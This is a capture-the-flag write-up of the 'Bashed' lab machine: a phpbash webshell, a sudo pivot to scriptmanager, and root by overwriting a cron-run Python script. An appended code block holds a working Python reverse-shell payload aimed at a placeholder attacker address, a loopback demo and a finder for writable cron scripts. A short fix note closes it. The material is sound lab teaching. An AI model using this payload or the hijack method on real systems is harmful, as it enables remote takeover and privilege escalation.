Bashed
Nmap
Over on port 80, the root page directs us to Arrexel's development site, which appears to be a blog. The first post mentions a webshell called phpbash.
![](https://viperone.gitbook.io/~gitbook/image?url=https%3A%2F%2F1600278159-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MFlgUPYI8q83vG2IJpI%252Fuploads%252Fgit-blob-c7fec8d1bb16ddea6368658ee2ad952df64abd54%252Fimage.png%3Falt%3Dmedia&width=768&dpr=4&quality=100&sign=f3157b36&sv=1)
Reading on, the post gives some further information about phpbash along with a link to its GitHub repository.
Running dirsearch.py against the web server with the big.txt wordlist from SecLists, we find the /dev/ directory.
![](https://viperone.gitbook.io/~gitbook/image?url=https%3A%2F%2F1600278159-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MFlgUPYI8q83vG2IJpI%252Fuploads%252Fgit-blob-fcc84e80c892642813d763c6c266162aa14e7434%252Fimage.png%3Falt%3Dmedia&width=768&dpr=4&quality=100&sign=670e3139&sv=1)
Browsing to that directory, we see a directory listing containing the phpbash.php shell mentioned earlier.
![](https://viperone.gitbook.io/~gitbook/image?url=https%3A%2F%2F1600278159-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MFlgUPYI8q83vG2IJpI%252Fuploads%252Fgit-blob-de4d97bfb912736f95d1871526e55fcdd89c2f6e%252Fimage.png%3Falt%3Dmedia&width=768&dpr=4&quality=100&sign=592eb259&sv=1)
Clicking phpbash.php takes us to the webshell.
Next, ideally we want a proper reverse shell rather than the webshell. I checked whether Python was installed with the which python command, which confirmed it was present. I then set up a netcat listener on my attacking machine and executed the command below in the webshell.
From here, checking sudo -l for sudo permissions shows that we can run all commands as the user 'scriptmanager' without providing a password. As such, running the command below spawns a bash shell as the user scriptmanager.
From here I noticed the non-default 'scripts' folder in '/', which contains two files: test.py and test.txt.
Viewing their contents, it looks like when test.py is executed it creates test.txt and writes the string 'testing 123!' to it.
Provided test.py is executed with elevated privileges, we can insert a Python reverse shell into it, as we are the owner of the file. To check whether it is being run by a cron job, I uploaded pspy64 to the target system.
After uploading the binary and setting the executable bit, I ran pspy64 and was presented with the following:
We see that a process is executed at a regular interval which runs any file in that directory ending in .py. Because we are the owner of test.py, I simply overwrote its contents with a Python reverse shell.
I then set a listener on port 53 on my attacking machine and soon after caught a root shell.
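The two reverse shells on this page (the one typed into phpbash.php and the one written into /scripts/test.py) are the same dup2-based Python payload, and the privilege escalation rests on one question: which of the files the root cron job executes can our user write? The block below is an added example, not the write-up's own commands or the author's code. It builds that payload, proves it works end to end over loopback (a local socket stands in for the netcat listener so it runs offline), and implements the writable-file check for a directory such as /scripts. The attacker IP in the main block is a placeholder, not a value from the page.

```python
"""Added example: Python reverse shell payload plus the cron-hijack check.
Not from the original write-up; LHOST/LPORT values are placeholders."""
import os
import socket
import subprocess
import sys


def python_reverse_shell(lhost: str, lport: int) -> str:
    """Return the classic one-liner. Run it as python -c '<payload>' from a
    webshell, or save it as test.py for the cron hijack. It connects back to
    lhost:lport, points fd 0/1/2 at the socket and hands control to /bin/sh."""
    return (
        "import socket,os,subprocess;"
        f"s=socket.socket();s.connect(('{lhost}',{lport}));"
        "[os.dup2(s.fileno(),fd) for fd in (0,1,2)];"
        "subprocess.call(['/bin/sh'])"
    )


def loopback_demo(command: str = "id") -> str:
    """Play the attacker's listener on 127.0.0.1, spawn the payload with the
    local interpreter (the 'victim'), send one command and return what the
    shell printed. Replaces 'nc -lvnp <port>' only so the example is offline."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))  # ephemeral port instead of 53 or 1234
    listener.listen(1)
    listener.settimeout(10)
    port = listener.getsockname()[1]
    payload = python_reverse_shell("127.0.0.1", port)

    # In the write-up this is the command executed inside phpbash.php.
    victim = subprocess.Popen(
        [sys.executable, "-c", payload],
        stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
    )
    conn, _ = listener.accept()
    conn.sendall(f"{command}\nexit\n".encode())
    chunks = []
    while True:  # read until the shell exits and the socket closes
        data = conn.recv(4096)
        if not data:
            break
        chunks.append(data)
    conn.close()
    listener.close()
    victim.wait(timeout=10)
    return b"".join(chunks).decode(errors="replace")


def writable_hijack_candidates(directory: str, suffix: str = ".py") -> list:
    """Files in `directory` ending in `suffix` that the *current* user can write.
    When a root cron job executes every such file (what pspy64 showed for
    /scripts), each hit is a path to root: overwrite it with the payload above
    and wait one interval. Checks effective permissions via os.access, so it
    catches group/other-writable files too, not only ones we own."""
    hits = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if name.endswith(suffix) and os.path.isfile(path) and os.access(path, os.W_OK):
            hits.append(path)
    return hits


if __name__ == "__main__":
    # 10.10.14.5 is a hypothetical attacker address, not one from the write-up.
    print(python_reverse_shell("10.10.14.5", 53))
    print(loopback_demo("id"))
```

The caveat the hijack check exposes is also the fix: scripts run by root on a timer must be root-owned and not writable by anyone else (mode 0755 or stricter), and the directory itself must not be writable either, or a user can drop a fresh .py next to the original instead of editing it.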